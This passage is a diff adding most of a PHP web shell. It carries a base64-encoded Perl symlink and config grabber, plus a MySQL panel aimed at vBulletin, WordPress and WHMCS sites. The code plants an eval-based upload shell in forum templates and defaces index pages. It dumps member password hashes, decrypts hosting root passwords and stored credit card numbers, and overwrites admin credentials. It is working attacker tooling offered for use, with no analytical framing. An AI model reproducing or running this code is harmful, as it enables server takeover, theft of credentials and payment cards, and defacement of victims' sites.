oLyYvLCAkYnVmZmVyKTsNCmZvcmVhY2ggJHBhaXIgKEBwYWlycykgew0KICAoJG5hbWUsICR2YWx1ZSkgPSBzcGxpdCgvPS8sICRwYWlyKTsNCiAgJG5hbWUgPX4gdHIvKy8gLzsNCiAgJG5hbWUgPX4gcy8lKFthLWZBLUYwLTldW2EtZkEtRjAtOV0pL3BhY2soIkMiLCBoZXgoJDEpKS9lZzsNCiAgJHZhbHVlID1+IHRyLysvIC87DQogICR2YWx1ZSA9fiBzLyUoW2EtZkEtRjAtOV1bYS1mQS1GMC05XSkvcGFjaygiQyIsIGhleCgkMSkpL2VnOw0KICAkRk9STXskbmFtZX0gPSAkdmFsdWU7DQp9DQppZiAoJEZPUk17cGFzc30gZXEgIiIpew0KcHJpbnQgJw0KPGJvZHkgY2xhc3M9Im5ld1N0eWxlMSIgYmdjb2xvcj0iIzAwMDAwMCI+DQogPGJyIC8+PGJyIC8+DQo8Zm9ybSBtZXRob2Q9InBvc3QiPg0KPHRleHRhcmVhIG5hbWU9InBhc3MiIHN0eWxlPSJib3JkZXI6MnB4IGRvdHRlZCAjMDAzMzAwOyB3aWR0aDogNTQzcHg7IGhlaWdodDogNDIwcHg7IGJhY2tncm91bmQtY29sb3I6IzBDMEMwQzsgZm9udC1mYW1pbHk6VGFob21hOyBmb250LXNpemU6OHB0OyBjb2xvcjojRkZGRkZGIiAgPjwvdGV4dGFyZWE+PGJyIC8+DQombmJzcDs8cD4NCjxpbnB1dCBuYW1lPSJ0YXIiIHR5cGU9InRleHQiIHN0eWxlPSJib3JkZXI6MXB4IGRvdHRlZCAjMDAzMzAwOyB3aWR0aDogMjEycHg7IGJhY2tncm91bmQtY29sb3I6IzBDMEMwQzsgZm9udC1mYW1pbHk6VGFob21hOyBmb250LXNpemU6OHB0OyBjb2xvcjojRkZGRkZGOyAiICAvPjxiciAvPg0KJm5ic3A7PC9wPg0KPHA+DQo8aW5wdXQgbmFtZT0iU3VibWl0MSIgdHlwZT0ic3VibWl0IiB2YWx1ZT0iR2V0IENvbmZpZyIgc3R5bGU9ImJvcmRlcjoxcHggZG90dGVkICMwMDMzMDA7IHdpZHRoOiA5OTsgZm9udC1mYW1pbHk6VGFob21hOyBmb250LXNpemU6MTBwdDsgY29sb3I6I0ZGRkZGRjsgdGV4dC10cmFuc2Zvcm06dXBwZXJjYXNlOyBoZWlnaHQ6MjM7IGJhY2tncm91bmQtY29sb3I6IzBDMEMwQyIgLz48L3A+DQo8L2Zvcm0+PGJyIC8+PGJyIC8+UmlnaHRzIG9mIHRoaXMgcGVybCB0byBLYXJhciBhTFNoYU1pJzsNCn1lbHNlew0KQGxpbmVzID08JEZPUk17cGFzc30+Ow0KJHkgPSBAbGluZXM7DQpvcGVuIChNWUZJTEUsICI+dGFyLnRtcCIpOw0KcHJpbnQgTVlGSUxFICJ0YXIgLWN6ZiAiLiRGT1JNe3Rhcn0uIi50YXIgIjsNCmZvciAoJGthPTA7JGthPCR5OyRrYSsrKXsNCndoaWxlKEBsaW5lc1ska2FdICA9fiBtLyguKj8pOng6L2cpew0KJmxpbCgkMSk7DQpwcmludCBNWUZJTEUgJDEuIi50eHQgIjsNCmZvcigka2Q9MTska2Q8MTg7JGtkKyspew0KcHJpbnQgTVlGSUxFICQxLiRrZC4iLnR4dCAiOw0KfQ0KfQ0KIH0NCnByaW50Jzxib2R5IGNsYXNzPSJuZXdTdHlsZTEiIGJnY29sb3I9IiMwMDAwMDAiPg0KPHA+RG9uZSAhITwvcD4NCjxwPiZuYnNwOzwvcD4nOw0KaWYoJEZPUk17dGFyfSBuZSAiIil7DQpvcGVuKElORk8sICJ0YXIudG1wIik7DQpAbGluZXMgPTxJTkZPPiA7DQpjbG9zZShJTkZPKTsNCnN5c3RlbShAbGluZXMpOw0KcHJpbnQnPHA+PGEgaHJlZj0iJy4kRk9STXt0YXJ9LicudGFyIj48Zm9udCBjb2xvcj0iIzAwRkYwMCI+DQo8c3BhbiBzdHlsZT0idGV4dC1kZWNvcmF0aW9uOiBub25lIj5DbGljayBIZXJlIFRvIERvd25sb2FkIFRhciBGaWxlPC9zcGFuPjwvZm9udD48L2E+PC9wPic7DQp9DQp9DQogcHJpbnQiDQo8L2JvZHk+DQo8L2h0bWw+Ijs=";
+
+$write = fwrite ($f2 ,base64_decode($sml_perl));
+
+if ($write)
+{
+
+@chmod('sa2/perl.pl',0755);
+
+
+}
+
+echo "<a href='sa2/perl.pl' target='_blank'>Symlink Perl</a>";
+}
+
+
+break;
+
+
+}
+/// home ///
+}
+}
+else
+{
+
+echo '
+The file path to symlink
+
+<br /><br />
+<form method="post">
+<input type="text" name="file" value="/home/user/public_html/file.name" size="60"/><br /><br />
+<input type="text" name="symfile" value="sa.txt" size="60"/><br /><br />
+<input type="submit" value="symlink" name="symlink" /> <br /><br />
+
+
+
+</form>
+';
+
+
+$pfile = $_POST['file'];
+$symfile = $_POST['symfile'];
+$symlink = $_POST['symlink'];
+
+if ($symlink)
+{
+
+@symlink("$pfile","sym/$symfile");
+
+echo '<br /><a target="_blank" href="sym/'.$symfile.'" >'.$symfile.'</a>';
+exit;
+}else {exit;}
+
+
+
+
+}
+
+
+
+break;
+
+
+
+//////////////////////// mysql ///////////////////////////////////////////////////////////////////////////////
+
+
+case 'ms':
+
+
+
+
+$host = $_POST['host'];
+$user = $_POST['user'];
+$pass = $_POST['pass'];
+$db = $_POST['db'];
+
+
+
+
+
+
+////////////////// HEEEEEEEEEEEEERE /////////////////////////////////////////////// HEEEEEEEEEEEEERE /////////////////////////////
+
+if ($_GET['show'] == 'tb'){
+
+$host_c = $_COOKIE['host_mysql'];
+$user_c = $_COOKIE['user_mysql'];
+$pass_c = $_COOKIE['pass_mysql'];
+$db_c = $_COOKIE['db_mysql'];
+
+
+$con = @mysql_connect($host_c,$user_c,$pass_c);
+$sel = @mysql_select_db($db_c);
+
+
+if(!$sel){ echo "mysql connect error" ; exit;}
+
+$dbname = $db_c;
+
+$pTable = mysql_list_tables( $dbname ) ;
+
+$num = mysql_num_rows( $pTable );
+
+echo "<div class='tmp'>
+<table align='center' width='40%'><td> Tables </td><td> Rows </td>";
+
+for( $i = 0; $i < $num; $i++ ) {
+
+
+ $tablename = mysql_tablename( $pTable, $i );
+
+ $sq3l=mysql_query("select * from $tablename");
+
+ $c3t=mysql_num_rows($sq3l);
+
+ echo "
+
+ <tr>
+
+<td>
+<div class='dom'><a href='$pg?sws=ms&show=cl&tb=$tablename' />".$tablename." </a> </div>
+</td>
+
+
+<td>
+".$c3t."
+</td>
+
+</tr>
+
+ ";
+
+
+
+
+if ($tablename == 'template') { $secript = 'vb'; }
+
+else if ($tablename == 'wp_post') {$secript = 'wp';}
+
+else if ($tablename == 'jos_users') {$secript = 'jm';}
+
+else if ($tablename == 'tbladmins') {$secript = 'wh';}
+
+
+}
+
+
+if ($secript == 'vb')
+
+{
+
+
+echo '<div class="cont">
+<div style="text-shadow: 0px 0px 4px #FFFFFF"> <b>Options vBulletin </b>
+<br /> <br /> <b>
+[ <a href="?sws=ms&op=in"> Update Index </a>]
+
+[<a href="?sws=ms&op=sh"> Inject shell</a>]
+
+[ <a href="?sws=ms&op=shm" >Show members Information</a>]
+';
+
+
+}
+
+
+
+else if ($secript == 'wp')
+{
+
+
+ echo '
+ <div class="cont">
+ <div style="text-shadow: 0px 0px 4px #FFFFFF"> <b>Options Wordpress </b><div>
+<br /> <br /> <b>
+[ <a href="?sws=ms&op=awp"> Change admin </a>]
+
+[ <a href="?sws=ms&op=shwp" >Show members</a>]';
+
+
+ }
+
+
+else if ($secript == 'wh'){
+
+ echo '
+ <div class="cont">
+ <div style="text-shadow: 0px 0px 4px #FFFFFF"> <b>Options Whmcs </b><div>
+<br /> <br /> <b>
+[ <a href="?sws=ms&op=hroot">roots</a>]
+[ <a href="?sws=ms&op=chost"> Clients Hosting Account </a>]
+[ <a href="?sws=ms&op=scard" >Cards</a>] <br /><br />
+[ <a href="?sws=ms&op=trak" >tickets</a>]
+[ <a href="?sws=ms&op=rtrak" >ticket replies</a>]
+ [ <a href="?sws=ms&op=sh3"> Search ticket</a>]
+[ <a href="?sws=ms&op=cadmin"> Change admin </a>]';
+
+
+}
+else{echo '<div class="cont"> ';}
+
+
+/////////////// cmd ////////////////////////////////
+ echo "<br /><br />
+
+ [ <a href='?sws=ms&op=bkup'> baukup </a>]
+ [ <a href='?sws=ms&op=css'> Inject css </a>]
+ <br /><br />
+<form method='post'>
+<textarea rows=\"3\" name=\"sql\">Cmd sql</textarea> <br /><br />
+<input type=\"submit\" value=\"SQL\" name='cmd'/>
+</form>
+<br /><br />
+<a style=\" float: right\" href=\"?sws=ms&op=out\" >[ Logout ]</a>";
+
+if (isset($_POST['cmd']))
+{
+
+$sql = $_POST['sql'];
+
+$query =@mysql_query($sql,$con) or die;
+
+if ($query){echo "<br /><br /><center><br /><div style=\"color: #003300; font-weight: bold\">CMD sql successfully </div> </center>";} elseif(!$query) {echo "<br /><br /><center><br /><div style=\"color: red; font-weight: bold\">CMD sql error </div> </center>";}
+
+
+}
+
+exit;
+
+
+}
+
+///////////////////// show cl ///////////////
+else if ($_GET['show'] == 'cl')
+
+{
+
+
+
+
+
+ $host_c = $_COOKIE['host_mysql'];
+ $user_c = $_COOKIE['user_mysql'];
+ $pass_c = $_COOKIE['pass_mysql'];
+ $db_c = $_COOKIE['db_mysql'];
+
+
+ $con = @mysql_connect($host_c,$user_c,$pass_c);
+ $sel = @mysql_select_db($db_c);
+
+ $tb = $_GET['tb'];
+
+ $col_sws = mysql_query("SHOW COLUMNS FROM $tb");
+
+ $num2 = mysql_num_rows( $col_sws );
+ echo "<div class='tmp'> <table align='center'><td>Columns Name</td><td>Content</td>";
+ for( $i2 = 0; $i2 < $num2; $i2++ ){
+
+ $col = mysql_fetch_row($col_sws) ;
+ $um_sws = $col[0];
+
+ echo "<tr><td>$um_sws&nbsp;</td>" ;
+
+
+ $tit = mysql_query ("SELECT * FROM $tb" );
+ while ($row = mysql_fetch_assoc($tit))
+ {
+
+ $cont = $row[$um_sws] ;
+
+ echo "<td>$cont</td></tr>" ;
+
+
+}
+
+;
+
+
+}
+
+
+
+
+exit;
+
+
+}
+
+
+
+
+
+
+
+
+
+if (isset($_COOKIE['host_mysql'])){
+
+if (!isset($_GET['op'])){
+
+echo " <meta http-equiv=\"refresh\" content=\"0; url=$pg?sws=ms&show=tb\" /> ";
+
+
+exit;
+}
+
+
+}
+
+
+
+
+
+else if (!isset($_COOKIE['host_mysql']))
+
+{
+
+
+if (!isset($host))
+{
+
+
+echo '
+
+<div >
+
+<br /><br /><br />
+<pre><form method="POST">
+host :<input type="text" name="host" /><br />
+user :<input type="text" name="user" /><br />
+pass :<input type="text" name="pass" /><br />
+db :<input type="text" name="db" /><br />
+<input type="submit" name="login" value="login .." />
+</form></pre>';
+exit;}
+else
+{
+
+$host = $_POST['host'];
+$user = $_POST['user'];
+$pass = $_POST['pass'];
+$db = $_POST['db'];
+
+
+$con = @mysql_connect($host,$user,$pass) ;
+
+$sel = @mysql_select_db($db,$con);
+
+if (!$sel)
+{
+
+echo " MYSQL INFOTMATI NOT TREY ";
+
+
+}
+
+else
+{
+
+
+
+setcookie( "host_mysql", $host);
+setcookie( "user_mysql", $user);
+setcookie( "pass_mysql", $pass);
+setcookie( "db_mysql", $db);
+ob_end_flush();
+
+echo " <meta http-equiv=\"refresh\" content=\"0; url=$pg?sws=ms&show=tb\" /> ";
+exit;
+
+
+
+
+
+}}}
+
+
+
+
+/////////////////////////////////// Options /////////////////////////////////////////
+
+if (isset($_GET['op']))
+{
+
+$op = $_GET['op'];
+
+ $host_c = $_COOKIE['host_mysql'];
+ $user_c = $_COOKIE['user_mysql'];
+ $pass_c = $_COOKIE['pass_mysql'];
+ $db_c = $_COOKIE['db_mysql'];
+
+ $con3 =@mysql_connect($host_c,$user_c,$pass_c) or die ;
+ $sedb3 =@mysql_select_db($db_c,$con3) or die;
+ if (!$sedb3){echo "error in mysql connect "; exit;}
+
+
+ /////// index vb ////////
+
+if ($op == 'in')
+{
+
+if (!isset($index)){
+
+echo '
+ Your index : <br /><br />
+ <form method="post">
+
+ <textarea rows="7" name="index" cols="40"></textarea>
+
+ <br /><br />
+ <input type="submit" value="Update Index" maxlength="30" name="sql" />
+ </form> ';
+}
+else if ($_POST['sql'])
+{
+
+
+$index =$_POST['index'];
+
+$index=str_replace("\'","'",$index);
+$crypt = "{\${eval(base64_decode(\'";
+$crypt .= base64_encode("echo \"$index\";");
+$crypt .= "\'))}}{\${exit()}}</textarea>";
+$sqlindex = "UPDATE `template` SET `template` = '$crypt'" or die;
+$query =@ mysql_query($sqlindex);
+
+if ($query)
+{
+ echo "<center><br /><div style=\"color: #003300; font-weight: bold\">Updated Index successfully </div> </center>";
+ echo "<a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
+ exit;
+}
+else if (!$query)
+{
+ echo "<center><br /><div style=\"color: #003300; font-weight: bold\">Updated Index erorr </div> </center>";
+ echo "<a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
+ exit;
+
+}
+
+
+
+
+}
+
+
+
+
+
+
+
+
+
+
+}
+/////// shelllll ///////////
+else if($op == 'sh')
+
+{
+
+
+
+if (!isset($_POST['ch']))
+{
+
+
+echo '
+<br /><br /><br />
+<form method="post">
+
+<select name="ch">
+<option value="faq">Inject shell in faq </option>
+<option value="cal">Inject shell in calendar </option>
+<option value="sea">Inject shell in search </option>
+</select>
+<br /><br /><br />
+<input type="submit" name="sql" value="Inject shell" />
+</form>
+
+
+
+';
+
+} if (isset($_POST['sql'])){
+
+$ch = $_POST['ch'];
+$shell = "DQoNCmVjaG8gJzxiPlsgYWwtc3dpc3JlIF0mbmJzcDsmbmJzcDtbIFNhdWRpIHNoZWxsIF08YnI+PGJyPjxicj48L2I+JzsgZWNobyAnPGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0icG9zdCIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgbmFtZT0idXBsb2FkZXIiIGlkPSJ1cGxvYWRlciI+JzsgZWNobyAnPGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9ImZpbGUiIHNpemU9IjUwIj48aW5wdXQgbmFtZT0iX3VwbCIgdHlwZT0ic3VibWl0IiBpZD0iX3VwbCIgdmFsdWU9IlVwbG9hZCI+PC9mb3JtPic7IGlmKCAkX1BPU1RbJ191cGwnXSA9PSAiVXBsb2FkIiApIHsgaWYoQGNvcHkoJF9GSUxFU1snZmlsZSddWyd0bXBfbmFtZSddLCAkX0ZJTEVTWydmaWxlJ11bJ25hbWUnXSkpIHsgZWNobyAnPGI+VXBsb2FkIFN1Y2Nlc3MgISEhPC9iPjxicj48YnI+JzsgfSBlbHNlIHsgZWNobyAnPGI+VXBsb2FkIEZhaWwgISEhPC9iPjxicj48YnI+JzsgfSB9IA0KPz4=" ;
+$crypt = "{\${eval(base64_decode(\'";
+$crypt .= "$shell";
+$crypt .= "\'))}}{\${exit()}}</textarea>";
+
+
+
+
+if ($ch == 'faq'){$sqlfaq="UPDATE template SET template ='".$crypt."' WHERE title ='FAQ'";}
+
+elseif ($ch == 'cal'){$sqlfaq="UPDATE template SET template ='".$crypt."' WHERE title ='CALENDAR'";}
+
+elseif ($ch == 'sea'){$sqlfaq="UPDATE template SET template ='".$crypt."' WHERE title ='search_forums'";}
+
+
+$query =@ mysql_query($sqlfaq);
+
+if ($query)
+{
+ echo "<br /><br /><center><br /><div style=\"color: #003300; font-weight: bold\">Injection has been successfully</div> </center>";
+ echo "<a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
+ exit;
+}
+else if (!$query)
+{
+ echo "<br /><br /><center><br /><div style=\"color: #003300; font-weight: bold\">Injection has been erorr !</div> </center>";
+ echo "<a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
+ exit;
+
+}
+
+
+}
+
+
+
+
+
+
+
+
+
+}
+else if ($op == 'shm')
+{
+
+
+
+
+
+$sql = 'select * from `user`';
+$query =@ mysql_query($sql);
+
+if ($query)
+{
+
+while ($row = mysql_fetch_assoc($query))
+{
+
+echo "
+<br /><br /><table cellpadding='4' cellspacing='4' align='center' class='tbm'>
+<tr>
+ <td>ID :</td>
+ <td>user :</td>
+ <td>pass :</td>
+ <td>salt :</td>
+ <td>email :</td>
+
+</tr>
+
+<tr>
+ <td>".$row['userid']."</td>
+ <td>".$row['username']."</td>
+ <td>".$row['password']."</td>
+ <td>".$row['salt']."</td>
+ <td>".$row['email']."</td>
+</tr>
+
+</table>
+
+ ";
+
+
+
+
+
+ }}
+
+}
+else if ($op == 'out')
+{
+
+setcookie( "host_mysql", $host,time()-3600);
+setcookie( "user_mysql", $user,time()-3600);
+setcookie( "pass_mysql", $pass,time()-3600);
+setcookie( "db_mysql", $db,time()-3600);
+ob_end_flush();
+
+
+echo " <meta http-equiv=\"refresh\" content=\"0; url=$pg?sws=ms\" /> ";
+exit;
+
+
+
+}
+
+///////////////////////////////// whmcs ////////////////////////////////////////
+
+
+else if ($op == 'hroot')
+{
+
+
+
+
+
+
+if (isset($_POST['viw']))
+{
+
+$hash = $_POST['hash'] ;
+
+
+$query = mysql_query("SELECT * FROM tblservers");
+
+ echo "<div class='tmp'><table cellpadding='5' align='center'>
+ hosting roots
+ <tr><td>Type</td><td>noc</td><td>Active</td><td>IP Address</td><td>username</td><td>Password</td></tr>";
+
+ while($row = mysql_fetch_array($query)) {
+
+ echo "<tr>
+ <td>{$row['type']}</td><td>{$row['noc']}</td><td>{$row['active']}</td><td>{$row['ipaddress']}</td><td>{$row['username']}</td><td>".decrypt($row['password'], $hash)."</td>
+
+ </tr>";
+ }
+ echo "</table>";
+
+
+ $query = mysql_query("SELECT * FROM tblhosting where username = 'root' or 'admin' or 'administrator'");
+ echo "<table cellpadding='5' align='center'>
+ <br /><br />
+ Clients roots
+ <tr><td>IP Address</td><td>username</td><td>Password</td></tr>";
+
+ while($row = mysql_fetch_array($query)) {
+
+ echo "<tr>
+ <td>{$row['dedicatedip']}</td><td>{$row['username']}</td><td>".decrypt($row['password'], $hash)."</td>
+
+ </tr>";
+ }
+ echo "</table></div>";
+ echo "<br /><a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
+ exit;
+
+
+}
+else
+{
+
+echo'<form method="post">
+ <br /><br />
+encryption hash <br /><br /><input type="text" name="hash" /><br /><br />
+<input type="submit" name="viw" value="show" />
+
+</form>';
+exit;
+
+
+
+
+
+}
+
+
+}
+
+
+//////////// domine ////////////
+
+ else if ($op == 'scard')
+
+{
+
+if (isset($_POST['viw']))
+{
+
+$hash = $_POST['hash'] ;
+
+
+$query = mysql_query('select * from `tblclients`') ;
+echo "<div class='tmp'><table cellpadding='5' align='center'> ";
+while($v = mysql_fetch_array($query)) {
+ echo "
+ <tr><td>cardtype</td>
+ <td>id</td>
+ <td>firstname</td>
+ <td>lastname</td>
+ <td>email</td>
+ <td>city</td>
+ <td>ciuntry</td>
+ <td>address1</td>
+ <td>lastlogin</td>
+ <td>phonenumber</td>
+ <td>datecreated</td>
+ <td>cardnum</td>
+ <td>startdate</td>
+ <td>expdate</td>
+ </tr>";
+ echo "<tr>
+
+ <td>{$v['cardtype']}</td>
+ <td>{$v['id']}</td>
+ <td>{$v['firstname']}</td>
+ <td>{$v['lastname']}</td>
+ <td>{$v['email']}</td>
+ <td>{$v['city']}</td>
+ <td>{$v['ciuntry']}</td>
+ <td>{$v['address1']}</td>
+ <td>{$v['lastlogin']}</td>
+ <td>{$v['phonenumber']}</td>
+ <td>{$v['datecreated']}</td>
+ <td>".decrypt ($v['cardnum'], $hash)."</td>
+ <td>".decrypt ($v['startdate'], $hash)."</td>
+ <td>".decrypt ($v['expdate'], $hash)."</td>
+ </tr></div></table>";
+ echo "<br /><a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
+ exit;
+
+ }
+}else
+{
+
+echo'<form method="post">
+ <br /><br />
+encryption hash <br /><br /><input type="text" name="hash" /><br /><br />
+<input type="submit" name="viw" value="show" />
+
+</form>';
+exit;
+
+
+
+
+
+}
+
+
+
+
+
+
+
+}
+
+ else if ($op == 'chost')
+
+{
+
+
+
+if (isset($_POST['viw']))
+{
+
+$hash = $_POST['hash'] ;
+
+$query = mysql_query("SELECT * FROM tblhosting");
+ echo "<div class='tmp'><table cellpadding='5' align='center'>
+ <tr><td>domain</td><td>Username</td><td>Pass</td><td>IP Address</td></tr>";
+ while($r = mysql_fetch_array($query)) {
+ echo "<tr><td>{$r['domain']}</td><td>{$r['username']}</td>
+ <td>".decrypt ($r['password'], $hash)."</td><td>{$r['dedicatedip']}</td></tr>";
+ }
+ echo "</table></div>";
+ echo "<br /><a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
+
+ exit;
+
+
+
+}
+else
+{
+
+echo'<form method="post">
+ <br /><br />
+encryption hash <br /><br /><input type="text" name="hash" /><br /><br />
+<input type="submit" name="viw" value="show" />
+
+</form>';
+exit;
+
+
+
+
+
+}
+
+
+
+
+
+
+
+}
+
+
+
+else if ($op == 'cadmin')
+
+{
+
+
+
+if (isset($_POST['viw']))
+{
+
+$pass = md5($_POST['pass']);
+$user = $_POST['user'];
+
+
+
+$query =@mysql_query("UPDATE `tbladmins` SET `username` ='".$user."' WHERE ID = 1");
+$query =@mysql_query("UPDATE `tbladmins` SET `password` ='".$pass."' WHERE ID = 1");
+
+if ($query)
+{
+ echo "<center><br /><div style=\"color: #003300; font-weight: bold\">Updated admin successfully </div> </center>";
+ echo "<br /><a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
+
+ exit;
+}
+
+else if (!$query)
+{
+ echo "<center><br /><div style=\"color: red; font-weight: bold\">Updated admin erorr </div> </center>";
+ echo "<br /><a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
+
+ exit;
+
+}
+
+
+
+
+
+
+
+}
+else
+{
+
+echo'<form method="post">
+ <br /><br />
+user : <input type="text" name="user" /><br /><br />
+pass : <input type="text" name="pass" /><br /><br />
+<input type="submit" name="viw" value="update" />
+
+</form>';
+
+
+exit;
+
+
+
+
+
+}
+}
+
+
+
+else if ($op == 'trak')
+
+{
+
+$page = $_GET['page'];
+$numpr = 30;
+if(!$page){$page = 0;}
+$sql0 = mysql_query("Select * from tbltickets");
+$num_r0s = mysql_num_rows($sql0);
+
+
+$sql = mysql_query("Select * from tbltickets order by id desc limit $page,$numpr");
+
+$ap = 1;
+echo "<br /><br /><div>Page : ";
+for ($s = 0 ; $s < $num_r0s; $s = $s+$numpr )
+{
+
+if ($page != $s) { echo "<a class='hr' href='$pg?sws=ms&op=trak&page=$s'>$ap</a>";}
+else {echo "<a class='hr2' href='$pg?sws=ms&op=trak&page=$s'>$ap</a>";}
+
+
+$ap ++;
+
+}
+
+echo "</div><br />";
+
+
+while ($r3o = mysql_fetch_assoc($sql))
+{
+
+$email = $r3o['email'];
+$date = $r3o['date'];
+$title = $r3o['title'];
+$message = $r3o['message'];
+echo "<div class='tmp'><table cellpadding='0' align='center' width='70%' >";
+
+echo "<tr><td>email : $email </td><td>date : $date </td><td>title : $title</td></tr>
+<tr > <td>message</td> <td colspan='3'>$message</td><br /><br /></tr>";
+echo "</table></div>";
+echo "<br /><a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
+exit;
+
+
+
+}
+
+}
+
+
+else if ($op == 'rtrak')
+
+{
+
+$page = $_GET['page'];
+$numpr = 25;
+if(!$page){$page = 0;}
+$sql0 = mysql_query("Select * from tblticketreplies");
+$num_r0s = mysql_num_rows($sql0);
+
+
+$sql = mysql_query("Select * from tblticketreplies order by id desc limit $page,$numpr");
+
+$ap = 1;
+echo "<br /><br /><div>Page : ";
+for ($s = 0 ; $s < $num_r0s; $s = $s+$numpr )
+{
+
+if ($page != $s) { echo "<a class='hr' href='$pg?sws=ms&op=trak&page=$s'>$ap</a>";}
+else {echo "<a class='hr2' href='$pg?sws=ms&op=trak&page=$s'>$ap</a>";}
+
+
+$ap ++;
+
+}
+
+echo "</div><br />";
+
+
+while ($r3o = mysql_fetch_assoc($sql))
+{
+
+$email = $r3o['email'];
+$date = $r3o['date'];
+$message = $r3o['message'];
+echo "<div class='tmp'><table cellpadding='0' align='center' width='70%' >";
+
+echo "<tr><td>email : $email </td><td>date : $date </td></tr>
+<tr > <td>message</td> <td colspan='2'>$message</td><br /><br /></tr>";
+echo "</table></div>";
+echo "<br /><a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
+exit;
+
+
+
+}
+
+}
+
+
+/////////////////////////////////// backup //////////////////////////
+
+else if ($op == 'bkup')
+{
+
+
+
+
+
+
+if (isset($_POST['viw']))
+{
+
+
+
+$path = $_POST['path'];
+
+$domp = @backup_tables($path,$host_c,$user_c,$pass_c,$db_c);
+
+
+ echo "<center><br /><div style=\"color: #003300; font-weight: bold\">Create backup successfully <br /><br /> $path</div> </center>";
+ echo "<br /><a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
+ exit;
+
+
+
+
+
+
+}
+else
+{
+
+echo'<form method="post">
+ <br /><br />
+path backup <br /><br /><input type="text" name="path" /><br /><br />
+<input type="submit" name="viw" value="Create" />
+
+</form>';
+exit;
+
+
+
+
+
+}
+
+
+}
+
+
+
+
+
+ else if ($op == 'sh3')
+
+{
+
+if (isset($_POST['viw']))
+{
+
+$string = $_POST['string'];
+$ch = $_POST['ch'];
+
+if ($ch == 'trs')
+{
+ $sql4 = @mysql_query("Select * from tblticketreplies WHERE `message` LIKE '%$string%'");
+
+}
+
+else if($ch == 'tr')
+ {
+ $sql4 = @mysql_query("Select * from tbltickets WHERE `message` LIKE '%$string%' ");
+ }
+
+
+
+
+$nu0 = @mysql_num_rows($sql4);
+if ($nu0 == 0){echo "No result"; exit;}
+
+while ($r33o = mysql_fetch_assoc($sql4))
+{
+
+
+$date = $r33o['date'];
+$title = $r33o['title'];
+$message = $r33o['message'];
+echo "<div class='tmp'><table cellpadding='0' align='center' width='70%' >";
+
+echo "<tr><td>email : $email </td><td>date : $date </td><td>title : $title</td></tr>
+<tr > <td>message</td> <td colspan='3'>$message</td><br /><br /></tr>";
+echo "</table></div>";
+exit;
+
+
+
+}
+
+
+
+
+
+}
+else
+{
+
+echo'<form method="post">
+ <br /><br />
+search : <input type="text" name="string" />&nbsp;&nbsp;<select name="ch">
+<option value="tr">ticket</option>
+<option value="trs">ticket replies</option>
+</select> <br /><br />
+<input type="submit" name="viw" value="search" />
+
+</form>';
+exit;
+
+
+
+
+
+}
+}
+
+
+
+
+else if ($op == 'sh3')
+
+{
+
+if (isset($_POST['viw']))
+{
+
+$string = $_POST['string'];
+$ch = $_POST['ch'];
+
+if ($ch == 'trs')
+{
+ $sql4 = @mysql_query("Select * from tblticketreplies WHERE `message` LIKE '%$string%'");
+
+}
+
+else if($ch == 'tr')
+ {
+ $sql4 = @mysql_query("Select * from tbltickets WHERE `message` LIKE '%$string%' ");
+ }
+
+
+
+
+$nu0 = @mysql_num_rows($sql4);
+if ($nu0 == 0){echo "No result"; exit;}
+
+while ($r33o = @mysql_fetch_assoc($sql4))
+{
+
+
+$date = $r33o['date'];
+$title = $r33o['title'];
+$message = $r33o['message'];
+echo "<div class='tmp'><table cellpadding='0' align='center' width='70%' >";
+
+echo "<tr><td>email : $email </td><td>date : $date </td><td>title : $title</td></tr>
+<tr > <td>message</td> <td colspan='3'>$message</td><br /><br /></tr>";
+echo "</table></div>";
+
+
+
+
+}
+
+
+
+
+
+}
+else
+{
+
+echo'<form method="post">
+ <br /><br />
+search : <input type="text" name="string" />&nbsp;&nbsp;<select name="ch">
+<option value="tr">ticket</option>
+<option value="trs">ticket replies</option>
+</select> <br /><br />
+<input type="submit" name="viw" value="search" />
+
+</form>';
+
+exit;
+
+
+
+
+}
+}
+
+
+else if ($op == 'css')
+
+{
+
+if (isset($_POST['viw']))
+{
+ $index = $_POST['index'];
+ $seh = $_POST['string'];
+ $rs = search($seh);
+ if(count($rs) == 0){echo 'No result';exit;}
+ foreach ($rs as $info)
+ {
+
+ $table = $info['table'];
+ $column = $info['column'];
+
+ echo "table : $table<br /><br />
+
+ column : $column
+ <form method=\"post\">
+ <br /><br />
+<input type='submit' name='v' value=\"inject\" />
+ <input type='hidden' name=\"index\" value=$index>
+ <input type=\"hidden\" name=\"table\" value='$table'>
+ <input type=\"hidden\" name=\"column\" value='$column' >
+ <input type=\"hidden\" name=\"shearc\" value='$seh'>
+</form>
+";
+
+exit;
+
+
+
+
+
+
+
+ }
+
+
+
+
+
+
+
+}
+else
+{
+
+echo'<form method="post">
+ <br /><br />
+search : <input type="text" name="string" />
+<br />
+Css url : <input type="text" name="index"><br /><br />
+<input type="submit" name="viw" value="search" />
+
+</form>';
+exit;
+
+
+
+
+
+}
+
+ if (isset($_POST['v']))
+ {
+
+ $seh = $_POST['shearc'] ;
+ $table = $_POST['table'];
+ $column = $_POST['column'] ;
+ $rlcss = $_POST['index'] ;
+
+ $data = "<head><link href=$rlcss rel=stylesheet></head>";
+
+ $query = mysql_query("UPDATE ".$table." SET ".$column." ='$data' WHERE `$column` LIKE '%$seh%'") or die(mysql_error());
+ if($query){
+ echo "<center><br /><div style=\"color: #003300; font-weight: bold\">Injection has been successfully</div> </center>";
+ echo "<br /><a href='$pg?sws=ms&show=tb'>[ Back ]</a>";
+ exit;
+ }else{
+ echo '<center><br /><div style=\"color: #003300; font-weight: bold\"> Injection erorr</div>';
+
+
+ exit;
+ }
+
+
+ }
+
+
+}
+
+
+else if ($op == 'awp')
+
+{
+
+
+
+if (isset($_POST['viw']))
+{
+
+$pass = $_POST['pass'];
+$user = $_POST['user'];
+
+
+$crypt = crypt($pass);
+
